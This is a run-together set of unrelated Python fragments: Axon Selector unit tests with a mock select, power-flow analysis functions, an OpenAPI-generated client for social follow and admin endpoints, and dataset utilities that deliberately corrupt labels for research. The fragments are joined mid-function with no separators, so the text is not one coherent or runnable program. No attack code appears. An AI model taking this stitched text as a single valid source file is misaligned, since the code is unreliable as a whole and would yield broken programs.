        S._deliver(newReader(S,( dummyservice, "LOOKINGFORTHISTOO") ),"notify")
        S._deliver(newReader(S,( dummyservice, "LOOKINGFORANDTHIS") ),"notify")
        for i in xrange(100): S.next()
        # Walk the call log until two consecutive select() calls are identical.
        lastfunc, lastargs = None, None
        i = 0
        func, args = MOCKSELECTORMODULE.log[i]
        while not( (lastfunc, lastargs) == (func, args)): # Search for quiescent state
            i = i + 1
            lastfunc, lastargs = func, args
            func, args = MOCKSELECTORMODULE.log[i]
        self.assertEqual("select", func, "select was called in the main loop")
        self.assertEqual(["LOOKINGFORTHIS","LOOKINGFORTHISTOO","LOOKINGFORANDTHIS"], args[0])#, "The selectable was added to the list of readables")

    def test_ActivityOnReaderResultsInMessageOnReadersService(self):
        "main - Activity on the selectable results in a message appearing in the service provided to the selector"
        MOCKSELECTORMODULE = MockSelect()
        SELECTORMODULE.select = MOCKSELECTORMODULE
        S = Selector()
        S.activate()
        for i in xrange(100): S.next()
        D = Axon.Component.component()
        dummyservice = (D, "inbox")
        S._deliver(newReader(S,( dummyservice, "LOOKINGFORTHIS") ),"notify")
        # Run the selector and pump the postoffice so deliveries propagate.
        for i in xrange(100):
            S.next();
            try:
                S.postoffice.next()
            except:
                pass
        self.assert_(not ( len(D.inboxes["inbox"]) == 0 ) )
        selectable = D.recv("inbox")
        self.assertEqual(selectable,"LOOKINGFORTHIS")#, "The value returned should be the selectable we originally asked for")

    def test_ActivityOnAnyReaderResultsInMessageOnThatReadersService(self):
        "main - Activity on a selectable results in a message appearing in the service provided to the selector for that selectable"
        MOCKSELECTORMODULE = MockSelect(results=[ (["LOOKINGFORTHIS"],[],[]), (["THENFORTHIS"],[],[]), (["ANDTHENFORTHIS"],[],[]) ])
        SELECTORMODULE.select = MOCKSELECTORMODULE
        S = Selector()
        S.activate()
        for i in xrange(100): S.next()
        D = Axon.Component.component()
        E = Axon.Component.component()
        F = Axon.Component.component()
        dummyservice1 = (D, "inbox")
        S._deliver(newReader(S,( dummyservice1, "LOOKINGFORTHIS") ),"notify")
        dummyservice2 = (E, "inbox")
        S._deliver(newReader(S,( dummyservice2, "THENFORTHIS") ),"notify")
        dummyservice3 = (F, "inbox")
        S._deliver(newReader(S,( dummyservice3, "ANDTHENFORTHIS") ),"notify")
        for i in xrange(100):
            S.next();
            try:
                S.postoffice.next()
            except:
                pass
        selectable = D.recv("inbox")
        self.assertEqual(selectable,"LOOKINGFORTHIS")#, "The value returned should be the selectable we originally asked for")
        selectable = E.recv("inbox")
        self.assertEqual(selectable,"THENFORTHIS")#, "The value returned should be the selectable we originally asked for")
        selectable = F.recv("inbox")
        self.assertEqual(selectable,"ANDTHENFORTHIS")#, "The value returned should be the selectable we originally asked for")

    def test_RemoveReader_ResultsInReaderNoLongerBeingSelectedOrWiredIn(self):
        "main - Sending a remove reader message unwires/links a component, and also removes it's selectable from the readers list"
        MOCKSELECTORMODULE = MockSelect(results=[ ([], [], [] )])
        SELECTORMODULE.select = MOCKSELECTORMODULE
        S = Selector()
        S.activate()
        for i in xrange(100): S.next()
        D = Axon.Component.component()
        dummyservice = (D, "inbox")
        S._deliver(newReader(S,( dummyservice, "LOOKINGFORTHIS") ),"notify")
        S._deliver(removeReader(S,"LOOKINGFORTHIS"),"notify")
        for i in xrange(100):
            S.next();
            try:
                S.postoffice.next()
            except:
                pass
        self.assert_( len(D.inboxes["inbox"]) == 0 )

    def test_ActivityOnAnyWriterResultsInMessageOnThatWritersService(self):
        "main - Activity on a selectable results in a message appearing in the service provided to the selector for that selectable"
        MOCKSELECTORMODULE = MockSelect(results=[ ([],["LOOKINGFORTHIS"],[]), ([],["THENFORTHIS"],[]), ([],["ANDTHENFORTHIS"],[]) ])
        SELECTORMODULE.select = MOCKSELECTORMODULE
        S = Selector()
        S.activate()
        for i in xrange(100): S.next()
        D = Axon.Component.component()
        E = Axon.Component.component()
        F = Axon.Component.component()
        dummyservice1 = (D, "inbox")
        S._deliver(newWriter(S,( dummyservice1, "LOOKINGFORTHIS") ),"notify")
        dummyservice2 = (E, "inbox")
        S._deliver(newWriter(S,( dummyservice2, "THENFORTHIS") ),"notify")
        dummyservice3 = (F, "inbox")
        S._deliver(newWriter(S,( dummyservice3, "ANDTHENFORTHIS") ),"notify")
        for i in xrange(100):
            S.next();
            try:
                S.postoffice.next()
            except:
                pass
        selectable = D.recv("inbox")
        self.assertEqual(selectable,"LOOKINGFORTHIS")#, "The value returned should be the selectable we originally asked for")
        selectable = E.recv("inbox")
        self.assertEqual(selectable,"THENFORTHIS")#, "The value returned should be the selectable we originally asked for")
        selectable = F.recv("inbox")
        self.assertEqual(selectable,"ANDTHENFORTHIS")#, "The value returned should be the selectable we originally asked for")

    def test_RemoveWriter_ResultsInWriterNoLongerBeingSelectedOrWiredIn(self):
        "main - Sending a remove writer message unwires/links a component, and also removes it's selectable from the writers list"
        MOCKSELECTORMODULE = MockSelect(results=[ ([], [], [] )])
        SELECTORMODULE.select = MOCKSELECTORMODULE
        S = Selector()
        S.activate()
        for i in xrange(100): S.next()
        D = Axon.Component.component()
        dummyservice = (D, "inbox")
        S._deliver(newWriter(S,( dummyservice, "LOOKINGFORTHIS") ),"notify")
        S._deliver(removeWriter(S,"LOOKINGFORTHIS"),"notify")
        for i in xrange(100):
            S.next();
            try:
                S.postoffice.next()
            except:
                pass
        print  # NOTE(review): leftover debug print in the original
        self.assert_( len(D.inboxes["inbox"]) == 0 )

    def test_ActivityOnAnyExceptionalResultsInMessageOnThatExceptionalsService(self):
        "main - Activity on a selectable results in a message appearing in the service provided to the selector for that selectable"
        MOCKSELECTORMODULE = MockSelect(results=[ ([],[],["LOOKINGFORTHIS"]), ([],[],["THENFORTHIS"]), ([],[],["ANDTHENFORTHIS"]) ])
        SELECTORMODULE.select = MOCKSELECTORMODULE
        S = Selector()
        S.activate()
        for i in xrange(5): S.next()
        D = Axon.Component.component()
        E = Axon.Component.component()
        F = Axon.Component.component()
        dummyservice1 = (D, "inbox")
        S._deliver(newExceptional(S,( dummyservice1, "LOOKINGFORTHIS") ),"notify")
        dummyservice2 = (E, "inbox")
        S._deliver(newExceptional(S,( dummyservice2, "THENFORTHIS") ),"notify")
        dummyservice3 = (F, "inbox")
        S._deliver(newExceptional(S,( dummyservice3, "ANDTHENFORTHIS") ),"notify")
        for i in xrange(5):
            S.next();
            try:
                S.postoffice.next()
            except:
                pass
        selectable = D.recv("inbox")
        self.assertEqual(selectable,"LOOKINGFORTHIS")#, "The value returned should be the selectable we originally asked for")
        selectable = E.recv("inbox")
        self.assertEqual(selectable,"THENFORTHIS")#, "The value returned should be the selectable we originally asked for")
        selectable = F.recv("inbox")
        self.assertEqual(selectable,"ANDTHENFORTHIS")#, "The value returned should be the selectable we originally asked for")

    def test_RemoveExceptional_ResultsInExceptionalNoLongerBeingSelectedOrWiredIn(self):
        "main - Sending a remove exceptional
""" Power Flow Analysis: Support Functions Created By: <NAME> <NAME> """ import numpy as np from numpy.linalg import inv import pandas as pd """ Imports Bus and line data from excel sheets Takes in an array containing ['File Location', 'Sheet Name'] Returns two panda data frames for the bus and line data """ def import_BusAndLineData(BusData_Location, LineData_Location): BusData = pd.read_excel(BusData_Location[0], sheet_name=BusData_Location[1]) LineData = pd.read_excel(LineData_Location[0], sheet_name=LineData_Location[1]) return BusData, LineData """ Builds G and B matrices to be used in Power Flow calculations Takes in data frame containing all line information, and number of busses in system Returns G and B arrays """ def build_AdmittanceMatrix(LineData, sys_Size): col = np.array(LineData.columns) line_From = np.array(LineData[col[0]]) line_To = np.array(LineData[col[1]]) line_R = np.array(LineData[col[2]]) line_X = np.array(LineData[col[3]]) line_Z = np.array(LineData[col[2]]) + 1j*np.array(LineData[col[3]]) line_Y = 1/line_Z line_B = np.array(LineData[col[4]]) line_Fmax = np.array(LineData[col[5]]) sys_Y = np.array([[0 for j in range(sys_Size)] for i in range(sys_Size)], dtype = complex) sys_G = np.zeros((sys_Size, sys_Size)) sys_B = np.zeros((sys_Size, sys_Size)) #X_ij for i in range(sys_Size): #Row for j in range(sys_Size): #Column if i==j: # Diagonal, sum of Y(From==i || To==i) + .5B(From==i || To ==i) sys_Y[i][j] = np.sum(line_Y[np.array(line_From==i+1) + np.array(line_To==i+1)]) \ +.5j*np.sum(line_B[np.array(line_From==i+1) + np.array(line_To==i+1)]) elif i<j: #Non Diagonal, -Y(From==i && To==j) sys_Y[i][j] = -np.sum(line_Y[np.multiply(np.array(line_From==i+1), np.array(line_To==j+1))]) else: #i>j =[j][i] sys_Y[i][j] = sys_Y[j][i] sys_G = sys_Y.real sys_B = sys_Y.imag return sys_Y, sys_G, sys_B """ Parses intial bus information from data Takes in Bus Data data frame Returns sys_: LoadP - active power consumed at node LoadQ - reactive power consumed at 
node BusType - type of bus<(S)lack, (G)enerator, (D)rain> PGen - Active Power produced by each generator node VRef - Reference voltages at PV busses """ def init_BusData(BusData): col = np.array(BusData.columns) sys_BusNum = np.array(BusData[col[0]]) sys_LoadP = np.array(BusData[col[1]]) sys_LoadQ = np.array(BusData[col[2]]) sys_BusType = np.array(BusData[col[3]]) sys_PGen = np.array(BusData[col[4]]) sys_VRef = np.array(BusData[col[5]]) return sys_BusNum, sys_LoadP, sys_LoadQ, sys_BusType, sys_PGen, sys_VRef """ Initializes System Data for processing Takes in sys_: LoadP - active power consumed at node LoadQ - reactive power consumed at node BusType - type of bus<(S)lack, (G)enerator, (D)rain> PGen - Active Power produced by each generator node VRef - Reference voltages at PV busses Returns a 2D array containing each buses's current information [i,:] - Bus i's information [:,0] - Bus # [:,1] - Voltage (V) [:,2] - Angle (T) [:,3] - Active Power (P_inj) [:,4] - P(T,V)-P_inj (mismatch) [:,5] - Reactive Power (Q_inj) [:,6] - Q(T,V)-Q_inj (mismatch) """ def init_SysData(sys_BusNum, sys_LoadP, sys_LoadQ, sys_BusType, sys_PGen, sys_VRef, sys_G, sys_B, S_Base): n= sys_LoadP.size sys_Data = np.zeros((n,7)) sys_Data[:,0] = sys_BusNum sys_Data[:,1] = sys_VRef #Sets initial voltages to provided reference sys_Data[:,2] = np.zeros(n) #Sets initial angles to zero sys_Data[:,3] = (sys_PGen-sys_LoadP)/S_Base #Sets initial power inject to Bus generation minus load in per unit sys_Data[sys_BusType=='S',3] = (np.sum(sys_LoadP)-np.sum(sys_PGen))/S_Base #Sets initial guess for active power required from slack bus sys_Data[:,5] = (-sys_LoadQ)/S_Base #Sets initial power inject to Bus generation minus load in per unit sys_Data[sys_BusType=='S',5] = (-np.sum(sys_LoadQ))/S_Base #Sets initial guess for reactive power required from slack bus for i in range(n): #Sets initial mismatch to calculated power from (V,T) minus expected inject sys_Data[i,4] = -sys_Data[i,3] sys_Data[i,6] = 
-sys_Data[i,5] for j in range(n): sys_Data[i,4] += sys_Data[i,1]*sys_Data[j,1]*\ (sys_G[i,j]*np.cos(sys_Data[i,2]-sys_Data[j,2])+\ sys_B[i,j]*np.sin(sys_Data[i,2]-sys_Data[j,2])) sys_Data[i,6] += sys_Data[i,1]*sys_Data[j,1]*\ (sys_G[i,j]*np.sin(sys_Data[i,2]-sys_Data[j,2])-\ sys_B[i,j]*np.cos(sys_Data[i,2]-sys_Data[j,2])) return sys_Data """ Determines Jacobian value for a given J_11 cell (dP/dT) Takes in: i, j, n, V_i, V_j, T_i, T_j, P_i, Q_i, G_ij, B_ij Returns Jacobian cell value """ def Jacobian_PowerFlow_11(i, j, V_i, V_j, T_i, T_j, P_i, Q_i, G_ij, B_ij): if(i==j): J_ij = -Q_i - B_ij*(V_i**2) else: J_ij = V_i*V_j*(G_ij*np.sin(T_i-T_j)-B_ij*np.cos(T_i-T_j)) return J_ij """ Determines Jacobian value for a given J_12 cell (dP/dV) Takes in: i, j, n, V_i, V_j, T_i, T_j, P_i, Q_i, G_ij, B_ij Returns Jacobian cell value """ def Jacobian_PowerFlow_12(i, j, V_i, V_j, T_i, T_j, P_i, Q_i, G_ij, B_ij): if(i==j): J_ij = (P_i/V_i) + G_ij*V_i else: J_ij = V_i*(G_ij*np.cos(T_i-T_j)+B_ij*np.sin(T_i-T_j)) return J_ij """ Determines Jacobian value for a given J_21 cell (dQ/dT) Takes in: i, j, n, V_i, V_j, T_i, T_j, P_i, Q_i, G_ij, B_ij Returns Jacobian cell value """ def Jacobian_PowerFlow_21(i, j, V_i, V_j, T_i, T_j, P_i, Q_i, G_ij, B_ij): if(i==j): J_ij = P_i-G_ij*(V_i**2) else: J_ij = -V_i*V_j*(G_ij*np.cos(T_i-T_j)+B_ij*np.sin(T_i-T_j)) return J_ij """ Determines Jacobian value for a given J_22 cell (dQ/dV) Takes in: i, j, n, V_i, V_j, T_i, T_j, P_i, Q_i, G_ij, B_ij Returns Jacobian cell value """ def Jacobian_PowerFlow_22(i, j, V_i, V_j, T_i, T_j, P_i, Q_i, G_ij, B_ij): if(i==j): J_ij = (Q_i/V_i)-B_ij*V_i else: J_ij = V_i*(G_ij*np.sin(T_i-T_j)-B_ij*np.cos(T_i-T_j)) return J_ij """ Processes 1 iteration of current system data Takes in sys_Data, a 2D array containing each node's current information [0] - Bus # [1] - Voltage (V) [2] - Angle (T) [3] - Active Power (P_inj) [4] - P(T,V)-P_inj (mismatch) [5] - Reactive Power (Q_inj) [6] - Q(T,V)-Q_inj (mismatch) As well as, the 
systems G and B matrices, and node types Returns the updated array """ def update_SysData(sys_Data, sys_G, sys_B, sys_BusType): n = sys_BusType.size D_index = sys_BusType=='D' G_index = sys_BusType=='G' S_index = sys_BusType=='S' """Determine Jacobian""" J = np.zeros((2*n,2*n)) for i in range(n): for j in range(n): #(i, j, V_i, V_j, T_i, T_j, P_i(T,V), Q_i(T,V), G_ij, B_ij) J[i,j] = Jacobian_PowerFlow_11(i, j, sys_Data[i,1], sys_Data[j,1], sys_Data[i,2], sys_Data[j,2], sys_Data[i,4]+sys_Data[i,3], sys_Data[i,6]+sys_Data[i,5], sys_G[i,j], sys_B[i,j]) J[i,j+n] = Jacobian_PowerFlow_12(i, j, sys_Data[i,1], sys_Data[j,1], sys_Data[i,2], sys_Data[j,2], sys_Data[i,4]+sys_Data[i,3], sys_Data[i,6]+sys_Data[i,5], sys_G[i,j], sys_B[i,j]) J[i+n,j] = Jacobian_PowerFlow_21(i, j, sys_Data[i,1], sys_Data[j,1], sys_Data[i,2], sys_Data[j,2], sys_Data[i,4]+sys_Data[i,3], sys_Data[i,6]+sys_Data[i,5], sys_G[i,j], sys_B[i,j]) J[i+n,j+n] =Jacobian_PowerFlow_22(i, j, sys_Data[i,1], sys_Data[j,1], sys_Data[i,2], sys_Data[j,2], sys_Data[i,4]+sys_Data[i,3], sys_Data[i,6]+sys_Data[i,5], sys_G[i,j], sys_B[i,j]) """Remove non-implicit values""" for i in range(n-1,-1,-1): if S_index[i]: J=np.delete(J, i+n, 0) J=np.delete(J, i+n, 1) J=np.delete(J, i, 0) J=np.delete(J, i, 1) elif G_index[i]: J=np.delete(J, i+n, 0) J=np.delete(J, i+n, 1) """Determine Inverse""" J_inv = inv(J) """Determine Delta T,V""" PQ = np.concatenate((sys_Data[np.invert(S_index), 4], sys_Data[D_index, 6])) Delta = -J_inv @ PQ Delta_T = Delta[0:sum(np.invert(S_index))] Delta_V = Delta[sum(np.invert(S_index)):sum(np.invert(S_index))+sum(D_index)] """Update T for non-slack buses, and V for PQ buses""" Delta_T_index = 0 Delta_V_index = 0 for i in range(n): if G_index[i]: sys_Data[i,2] += Delta_T[Delta_T_index] Delta_T_index += 1 elif D_index[i]: sys_Data[i,1] += Delta_V[Delta_V_index] Delta_V_index += 1 sys_Data[i,2] += Delta_T[Delta_T_index] Delta_T_index += 1 """Update P_inj for slack bus, and Q_inj for non PQ buses""" for i in 
range(n): if S_index[i]:#Update Slack P_inj sys_Data[i,3] = 0 if (S_index[i] or G_index[i]):#Update non PQ Q_inj sys_Data[i,5] = 0 for j in range(n): if S_index[i]:#Update Slack sys_Data[i,3] += sys_Data[i,1]*sys_Data[j,1]*((sys_G[i,j]*np.cos(sys_Data[i,2]-sys_Data[j,2]))+(sys_B[i,j]*np.sin(sys_Data[i,2]-sys_Data[j,2]))) if (S_index[i] or G_index[i]):#Update non PQ sys_Data[i,5] += sys_Data[i,1]*sys_Data[j,1]*((sys_G[i,j]*np.sin(sys_Data[i,2]-sys_Data[j,2]))-(sys_B[i,j]*np.cos(sys_Data[i,2]-sys_Data[j,2]))) """Update mismatch columns""" for i in range(n): sys_Data[i,4] = -sys_Data[i,3] sys_Data[i,6] = -sys_Data[i,5] for j in range(n): sys_Data[i,4] += sys_Data[i,1]*sys_Data[j,1]*((sys_G[i,j]*np.cos(sys_Data[i,2]-sys_Data[j,2]))+(sys_B[i,j]*np.sin(sys_Data[i,2]-sys_Data[j,2]))) sys_Data[i,6] += sys_Data[i,1]*sys_Data[j,1]*((sys_G[i,j]*np.sin(sys_Data[i,2]-sys_Data[j,2]))-(sys_B[i,j]*np.cos(sys_Data[i,2]-sys_Data[j,2]))) return sys_Data """ Takes in voltage and theta values, shunt capacitance, and the admittance matrix Returns Power Values: S_ij - Apparent Power P_ij - Real Power Q_ij - Reactive Power """ def PowerFlow (V_i,T_i,V_j,T_j,B_tot,y_ij): I_ij = y_ij * (V_i * np.cos(T_i) + 1j * V_i * np.sin(T_i) - V_j * np.cos(T_j) - 1j * V_j * np.sin(T_j)) + (1j*B_tot / 2) * (V_i * np.cos(T_i) + 1j * V_i * np.sin(T_i)) S_ij = (V_i*np.cos(T_i)+1j*V_i*np.sin(T_i)) * (I_ij.conjugate()) return abs(S_ij), S_ij.real, S_ij.imag """ Takes in matrices sys_Data, LineData, and sys_Y Returns lists: i Bus # (i_buses) j Bus # (j_buses) Apparent Power (S_ij) Active Power (P_ij) Reactive Power (Q_ij) Violation Occurrence (violation) """ def LineFlowResults (sys_Data, LineData, sys_Y): LD_val = LineData.values S_ij = [] P_ij = [] Q_ij = [] i_buses = LD_val[0:,0] j_buses = LD_val[0:,1] violation = [] for i in range (0, len(LineData)): B_tot = (LD_val[i:i+1,4]) V_i = sys_Data[(int(LD_val[i:i+1,0]))-1:(int(LD_val[i:i+1,0])),1] T_i = sys_Data[(int(LD_val[i:i + 1, 0])) - 1:(int(LD_val[i:i + 1, 
0])), 2] V_j = sys_Data[(int(LD_val[i:i + 1, 1])) - 1:(int(LD_val[i:i + 1, 1])), 1] T_j = sys_Data[(int(LD_val[i:i + 1, 1])) - 1:(int(LD_val[i:i + 1, 1])), 2] y_ij = -1 * ( sys_Y[(int(LD_val[i:i + 1, 0]) - 1):(int(LD_val[i:i + 1, 0])), (int(LD_val[i:i + 1, 1]) - 1)]) PowerFlow(V_i, T_i, V_j, T_j, B_tot, y_ij) s_ij, p_ij, q_ij = PowerFlow(V_i,T_i,V_j,T_j,B_tot,y_ij) if s_ij*100 < (LD_val[i:i+1,5]): violation.append('FALSE') else: violation.append('TRUE') S_ij.append(100 * float(s_ij)) P_ij.append(100 * float(p_ij)) Q_ij.append(100 * float(q_ij)) return S_ij, P_ij, Q_ij, violation, i_buses, j_buses """ Collects needed bus data from sys_Data Returns lists: Bus Number (bus_nums) Bus Voltages (bus_v) Bus Thetas (bus_deg) Bus Active Power (bus_p) Bus Reactive Power (bus_q) Reactive Power (Q_ij) Voltage Violation Occurrence (V_violate) """ def BusResults(sys_Data): V_violate = [] for i in range (0,len(sys_Data)): if (sys_Data[i:i+1,1] <= 1.05 and sys_Data[i:i+1,1] >= 0.95): V_violate.append('FALSE') else: V_violate.append('TRUE') bus_nums = sys_Data[0:,0] bus_v = sys_Data[0:,1] bus_deg = 180* sys_Data[0:,2] / np.pi bus_p = 100 * sys_Data[0:,3] bus_q = 100 * sys_Data[0:,5] return bus_nums.astype(int), bus_v, bus_deg, bus_p, bus_q, V_violate """ Collects the filename, sys_Data, LineData, sys_Y,
) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_spec_property_naming'] = kwargs.get( '_spec_property_naming', False ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['session_token'] = \ session_token kwargs['uid'] = \ uid kwargs['uid_list'] = \ uid_list return self.v1_user_uid_follow_post_endpoint.call_with_http_info(**kwargs) def v1_user_uid_followers_get( self, session_token, uid, **kwargs ): """Returns the list of followers for a specific user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = pod_api.v1_user_uid_followers_get(session_token, uid, async_req=True) >>> result = thread.get() Args: session_token (str): Session authentication token. uid (int): User ID as a decimal integer of the user we want to get the followers list Keyword Args: limit (int): This is the maximum number of objects that may be returned.. [optional] before (str): Returns results from an opaque “before” cursor value as presented via a response cursor.. [optional] after (str): Returns results from an opaque “after” cursor value as presented via a response cursor.. [optional] _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. 
_check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _spec_property_naming (bool): True if the variable names in the input data are serialized names, as specified in the OpenAPI document. False if the variable names in the input data are pythonic names, e.g. snake case (default) _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: FollowersListResponse If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_spec_property_naming'] = kwargs.get( '_spec_property_naming', False ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['session_token'] = \ session_token kwargs['uid'] = \ uid return self.v1_user_uid_followers_get_endpoint.call_with_http_info(**kwargs) def v1_user_uid_following_get( self, session_token, uid, **kwargs ): """Returns the list of users that a specific user is following # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = pod_api.v1_user_uid_following_get(session_token, uid, async_req=True) >>> result = thread.get() Args: session_token (str): Session authentication token. 
uid (int): User ID as a decimal integer of the user we want to get the following list Keyword Args: limit (int): This is the maximum number of objects that may be returned.. [optional] before (str): Returns results from an opaque “before” cursor value as presented via a response cursor.. [optional] after (str): Returns results from an opaque “after” cursor value as presented via a response cursor.. [optional] _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _spec_property_naming (bool): True if the variable names in the input data are serialized names, as specified in the OpenAPI document. False if the variable names in the input data are pythonic names, e.g. snake case (default) _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: FollowingListResponse If the method is called asynchronously, returns the request thread. 
""" kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_spec_property_naming'] = kwargs.get( '_spec_property_naming', False ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['session_token'] = \ session_token kwargs['uid'] = \ uid return self.v1_user_uid_following_get_endpoint.call_with_http_info(**kwargs) def v1_user_uid_unfollow_post( self, session_token, uid, uid_list, **kwargs ): """Make a list of users unfollowing a specific user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = pod_api.v1_user_uid_unfollow_post(session_token, uid, uid_list, async_req=True) >>> result = thread.get() Args: session_token (str): Session authentication token. uid (int): User ID as a decimal integer of the user to be unfollowed uid_list (FollowersList): List of (integer) User IDs of the followers Keyword Args: _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. 
_check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _spec_property_naming (bool): True if the variable names in the input data are serialized names, as specified in the OpenAPI document. False if the variable names in the input data are pythonic names, e.g. snake case (default) _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: SuccessResponse If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_spec_property_naming'] = kwargs.get( '_spec_property_naming', False ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['session_token'] = \ session_token kwargs['uid'] = \ uid kwargs['uid_list'] = \ uid_list return self.v1_user_uid_unfollow_post_endpoint.call_with_http_info(**kwargs) def v2_admin_user_create_post( self, session_token, payload, **kwargs ): """Create a new V2 User # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = pod_api.v2_admin_user_create_post(session_token, payload, async_req=True) >>> result = thread.get() Args: session_token (str): Session authentication token. 
payload (V2UserCreate): Keyword Args: _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _spec_property_naming (bool): True if the variable names in the input data are
<reponame>maragraziani/intentionally_flawed_models<gh_stars>1-10 import keras.backend as K import numpy as np import keras.datasets import matplotlib.pyplot as plt import keras #from memorization_utils import * import os from sklearn.linear_model import Ridge import sys sys.path.append('../rcvs_fexps/') sys.path.append('../rcvs_fexps/iMIMIC-RCVs/') sys.path.append('../rcvs_fexps/iMIMIC-RCVs/scripts/') sys.path.append('../rcvs_fexps/iMIMIC-RCVs/scripts/keras_vis_rcv/') #from rcv_utils import * from mnist_utils import * import rcv_utils import PIL from scipy import misc import numpy as np #import tensorflow as tf import argparse import cv2 import h5py """ dataset_utils contains the list of classes and functions used to create the datasets and to add the label perturbations """ class Dataset(): def __init__(self, train_data, val_data, test_data, label_corrupt_p = 0.0, gaussian_noise_f = 0.0, num_classes=46, random_seed = 1): self.x_train = train_data[0] self.x_val = val_data[0] self.x_test = test_data[0] self.y_train = train_data[1] self.y_val = val_data[1] self.y_test = test_data[1] self.num_classes = num_classes self.train_mask = np.zeros(len(self.y_train)) self.seed = random_seed if label_corrupt_p > 0.0: self.label_corrupt(label_corrupt_p) if gaussian_noise_f > 0.0: self.gaussian_noise(gaussian_noise_f) def label_corrupt(self, corrupted): ## NEW VERSION # Corrupts the labels in the training set according to # the specified corruption probability print 'NEW VERS' labels=np.array(self.y_train) #labels = np.reshape(len(labels),1) np.random.seed(self.seed) mask = np.random.rand(len(labels)) <= corrupted #rnd_labels = np.random.choice(self.num_classes, mask.sum()) true_labels = labels[mask] #rnd_labels = np.reshape(rnd_labels, (len(rnd_labels),1)) #labels[mask] = rnd_labels print true_labels print np.shape(true_labels) np.random.shuffle(true_labels) print true_labels print np.shape(true_labels) labels[mask] = true_labels #labels = [int(x) for x in labels] # corruption 
self.y_train = labels self.train_mask = mask def gaussian_noise(self, gaussian_noise_f): # Adds Gaussian Noise to the images, # matching the real dataset's mean and variance data = np.array(self.x_train) mean = np.mean(data) var = np.std(data) sigma = var**0.5 #import pdb; pdb.set_trace() n_samples, row, col = data.shape mask = np.random.rand(n_samples) <= gaussian_noise_f gaussian = np.random.normal(mean, sigma, (row, col)) gaussian = gaussian.reshape(row, col) noisy_imgs = [x+gaussian for x in data[mask]] data[mask] = noisy_imgs self.x_train = data def check_max_img_size(img_list, source): max_img_width = 0 max_img_height = 0 for img_name in img_list: img_shape = np.asarray(PIL.Image.open('{}/dtd/images/{}'.format(source, img_name))).shape #import pdb; pdb.set_trace() img_height, img_width = img_shape[0], img_shape[1] if img_height>max_img_height: max_img_height = img_height if img_width>max_img_width: max_img_width = img_width return max_img_height, max_img_width def load_split(no, source, textures): print "Loading split no. 
